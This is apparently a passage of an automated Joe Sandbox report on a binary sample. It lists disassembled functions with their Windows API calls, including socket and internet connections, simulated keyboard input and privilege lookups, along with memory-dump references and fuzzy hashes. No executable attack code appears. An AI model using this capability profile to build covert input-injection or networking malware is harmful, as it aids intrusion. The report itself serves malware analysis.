                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: b90f0253323225050f41536fc131beadcf8c474679e3605a7d02c5f13a62ffa3
                                                            • Instruction ID: 2db189d8920c37c402916e7ea473f146e218f0551318d7e224c6efb8af08d253
                                                            • Opcode Fuzzy Hash: b90f0253323225050f41536fc131beadcf8c474679e3605a7d02c5f13a62ffa3
                                                            • Instruction Fuzzy Hash: D1812C71A00119EFCB14DFA8C984EEEB7B9FF89315F244598E505AB250DB71AE06CB60
                                                            Function 00D2687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: 47cfd9663f458a013d73b1ab57c06be593ec78d906f33c98b5229fb5f95cbf2b
                                                            • Instruction ID: dfad8a2d3918e5f6b0a3a99ebd0d897b3eb38b2179043e2e20207db314f498b6
                                                            • Opcode Fuzzy Hash: 47cfd9663f458a013d73b1ab57c06be593ec78d906f33c98b5229fb5f95cbf2b
                                                            • Instruction Fuzzy Hash: 8C51C2747003119ACB24AF65E8A1A3AB3E5EF64318F24D81FE596DB291DF30DC809B31
                                                            Function 00D469AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00D469D1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D469E1
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D46A45
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46A51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: f43cc4f9a40f0189ea2a83635d942d60f20b0319418c8fda98b00343f3160cec
                                                            • Instruction ID: 9c1cc78722187f377b2bca653e55f5afd053a522664d775cfa0b36f20a7f9729
                                                            • Opcode Fuzzy Hash: f43cc4f9a40f0189ea2a83635d942d60f20b0319418c8fda98b00343f3160cec
                                                            • Instruction Fuzzy Hash: 9C417E75640300AFEB60AF68DC86F2A77A9DB05B14F048419FA59AF3D2DA709D009BA1
                                                            Function 00D4641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00D5F910), ref: 00D464A7
                                                            • _strlen.LIBCMT ref: 00D464D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: dd960e39780510f33caabaa1841d7d45b94a7e78084c7cb76069fa80b25b76ea
                                                            • Instruction ID: 80c30f0d2653621b1ac540d98348d510ae7dbd30ad858045b55994165a3430e4
                                                            • Opcode Fuzzy Hash: dd960e39780510f33caabaa1841d7d45b94a7e78084c7cb76069fa80b25b76ea
                                                            • Instruction Fuzzy Hash: BE419575900204ABCB14FBA8DC95EBEB7A9EF05310F148156F91A9B396EB30ED04DB71
                                                            Function 00D3B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D3B89E
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00D3B8C4
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D3B8E9
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D3B915
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: f8a1f3933781e4022f1afaad5306638870d4f9c2fc03a60789b3f7b1d977e0a8
                                                            • Instruction ID: 104d7e0f953b36800adfefc982e6c4dd8c0fbdb2211c9464d4d1ce2c6c2f3713
                                                            • Opcode Fuzzy Hash: f8a1f3933781e4022f1afaad5306638870d4f9c2fc03a60789b3f7b1d977e0a8
                                                            • Instruction Fuzzy Hash: 06411D39A00650DFCB11EF15C445A59BBE1EF49720F19809AEE4A9F362CB34FD01EBA1
                                                            Function 00D5AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 00D5AB60
                                                            • GetWindowRect.USER32(?,?), ref: 00D5ABD6
                                                            • PtInRect.USER32(?,?,00D5C014), ref: 00D5ABE6
                                                            • MessageBeep.USER32(00000000), ref: 00D5AC57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 85daa392cd5d1a2bdef3dab71d16d4a717d6dcbb525413382330073b9ba2d340
                                                            • Instruction ID: 50837598c1531ac361ccfe8ba1062b6a1fc6d772593843fecf35c0b7af7f02cd
                                                            • Opcode Fuzzy Hash: 85daa392cd5d1a2bdef3dab71d16d4a717d6dcbb525413382330073b9ba2d340
                                                            • Instruction Fuzzy Hash: 4E4138346002299FCF12DF5CD884A697BF5FF49312F1882A9EC55DB364D730A8498BA2
                                                            Function 00D30AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00D30B27
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00D30B43
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00D30BA9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00D30BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 7f819dcb578ac92ba6d3f9c9230917136bbb336a18522c3ff59f1db8f29c3995
                                                            • Instruction ID: df303c6245315037e74a3d64e74aa6c195fd5d159924dcef9c3ff3c7a0fcd479
                                                            • Opcode Fuzzy Hash: 7f819dcb578ac92ba6d3f9c9230917136bbb336a18522c3ff59f1db8f29c3995
                                                            • Instruction Fuzzy Hash: 87312470A40318AEFB308B29CC25BFAFFB9AB45319F0C426AE4D1961D1D3B589849775
                                                            Function 00D30C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00D30C66
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D30C82
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D30CE1
                                                            • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00D30D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 33ee3b5ebef5bb839f944fefb8a4ffd462baa237c32e579263958b632e33ae8b
                                                            • Instruction ID: 73a9f76f54edd6b45cb5db14defa65502ec9af77b8f734ee8a6925607270b852
                                                            • Opcode Fuzzy Hash: 33ee3b5ebef5bb839f944fefb8a4ffd462baa237c32e579263958b632e33ae8b
                                                            • Instruction Fuzzy Hash: 33314430900318AEFF308B65D824BFEBFBAAB45321F0C976AE481925D1D3759995C7B1
                                                            Function 00D061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D061FB
                                                            • __isleadbyte_l.LIBCMT ref: 00D06229
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D06257
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D0628D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 1da052a387ff321648c453c66873a6594b91c2355afe2933afcba4dc972af79a
                                                            • Instruction ID: 0e0e3ce5bf03559a59094352ba54b1638b0c6290bacbc45f05875e0c54edff20
                                                            • Opcode Fuzzy Hash: 1da052a387ff321648c453c66873a6594b91c2355afe2933afcba4dc972af79a
                                                            • Instruction Fuzzy Hash: BF31AC31604346AFDB218F75CC44BBA7BA9FF41310F194429F8689B1E1E731E960DBA5
                                                            Function 00D54EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00D54F02
                                                              • Part of subcall function 00D33641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D3365B
                                                              • Part of subcall function 00D33641: GetCurrentThreadId.KERNEL32 ref: 00D33662
                                                              • Part of subcall function 00D33641: AttachThreadInput.USER32(00000000,?,00D35005), ref: 00D33669
                                                            • GetCaretPos.USER32(?), ref: 00D54F13
                                                            • ClientToScreen.USER32(00000000,?), ref: 00D54F4E
                                                            • GetForegroundWindow.USER32 ref: 00D54F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: ff101f38fddb3b5b9474f35ac8996c74da0c77167b86216500110c758847045e
                                                            • Instruction ID: bcc65d4720768822491d42efc01c8b2ef876c0df8d3032ae4139faef437e603b
                                                            • Opcode Fuzzy Hash: ff101f38fddb3b5b9474f35ac8996c74da0c77167b86216500110c758847045e
                                                            • Instruction Fuzzy Hash: 69310D75D00208AFDB00EFA9C9859EFB7F9EF98304F10406AE915E7341EA719E459BA1
                                                            Function 00D5C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • GetCursorPos.USER32(?), ref: 00D5C4D2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D0B9AB,?,?,?,?,?), ref: 00D5C4E7
                                                            • GetCursorPos.USER32(?), ref: 00D5C534
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D0B9AB,?,?,?), ref: 00D5C56E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: f8648fb618f12e500e95eae862f6e7d5ed98488f45ea665bc89f57e5315bd766
                                                            • Instruction ID: 0ffa9f5bec3aeef7bd54b500c175d069701df8832eaabce483933a851ceab408
                                                            • Opcode Fuzzy Hash: f8648fb618f12e500e95eae862f6e7d5ed98488f45ea665bc89f57e5315bd766
                                                            • Instruction Fuzzy Hash: 9231A035610218AFCF26CF98D858EEA7BB5EB09311F48406AFD058B361D731AD54DBB4
                                                            Function 00D28656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D28121
                                                              • Part of subcall function 00D2810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D2812B
                                                              • Part of subcall function 00D2810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D2813A
                                                              • Part of subcall function 00D2810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28141
                                                              • Part of subcall function 00D2810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D28157
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D286A3
                                                            • _memcmp.LIBCMT ref: 00D286C6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D286FC
                                                            • HeapFree.KERNEL32(00000000), ref: 00D28703
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                            • String ID:
                                                            • API String ID: 1592001646-0
                                                            • Opcode ID: b66e209e3c5353abf6146edaf7e86dba2a5425637895d7c4573898d765e50557
                                                            • Instruction ID: 2ea8756fbe5ce04f0b9977cbd7e2d02607e10ef67e2ccd416f80ade3b97b0e67
                                                            • Opcode Fuzzy Hash: b66e209e3c5353abf6146edaf7e86dba2a5425637895d7c4573898d765e50557
                                                            • Instruction Fuzzy Hash: 7D21C431D02218EFDB10DF98D948BEEB7F8EF6031AF184059E845AB240DB30AE05DB60
                                                            Function 00CF098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __setmode.LIBCMT ref: 00CF09AE
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            • _fprintf.LIBCMT ref: 00CF09E5
                                                            • OutputDebugStringW.KERNEL32(?), ref: 00D25DBB
                                                              • Part of subcall function 00CF4AAA: _flsall.LIBCMT ref: 00CF4AC3
                                                            • __setmode.LIBCMT ref: 00CF0A1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                            • String ID:
                                                            • API String ID: 521402451-0
                                                            • Opcode ID: 71878834fbd3a7246472e438d22fb4b7486eb5a8038b74d70b7aa304f37fa2e7
                                                            • Instruction ID: 6812b09eec2d76a533064f2a939e451546398a0855e2982791c5896e2e77e132
                                                            • Opcode Fuzzy Hash: 71878834fbd3a7246472e438d22fb4b7486eb5a8038b74d70b7aa304f37fa2e7
                                                            • Instruction Fuzzy Hash: 5B110272904208AFDB48B3B4AC46DBEB7A8DF41320F240056F30497283EE304946B7A6
                                                            Function 00D41767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D417A3
                                                              • Part of subcall function 00D4182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D4184C
                                                              • Part of subcall function 00D4182D: InternetCloseHandle.WININET(00000000), ref: 00D418E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Internet$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 1463438336-0
                                                            • Opcode ID: 5a3e6210bf2f27ea3507efd6990f9c38e91bc9fa148f1ce5daf63b41d41abf7d
                                                            • Instruction ID: ae72e02519150a337c3f251ff7ee2a24898f5b67ecd8c2c5db21b6785bb713e3
                                                            • Opcode Fuzzy Hash: 5a3e6210bf2f27ea3507efd6990f9c38e91bc9fa148f1ce5daf63b41d41abf7d
                                                            • Instruction Fuzzy Hash: E021903A200705BFEB129F60DC41FBABBA9FF48711F14402AFA95D6650DB71D851ABB0
                                                            Function 00D33A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00D5FAC0), ref: 00D33A64
                                                            • GetLastError.KERNEL32 ref: 00D33A73
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D33A82
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D5FAC0), ref: 00D33ADF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: d77ef07aaca48275d0fee38a86fda2b403a424c49c9f1404f04af0116014101a
                                                            • Instruction ID: 380d8b3c3e043476c1db91fdf6513f896bb4de366bebb1267bd76890a9ee034e
                                                            • Opcode Fuzzy Hash: d77ef07aaca48275d0fee38a86fda2b403a424c49c9f1404f04af0116014101a
                                                            • Instruction Fuzzy Hash: 5C2191755083019F8700DF28C98586BB7E8EF55364F144A2AF8D9C72A1EB31DA4ACB62
                                                            Function 00D050E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00D05101
                                                              • Part of subcall function 00CF571C: __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CF571C: __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CF571C: RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            Memory Dump Source
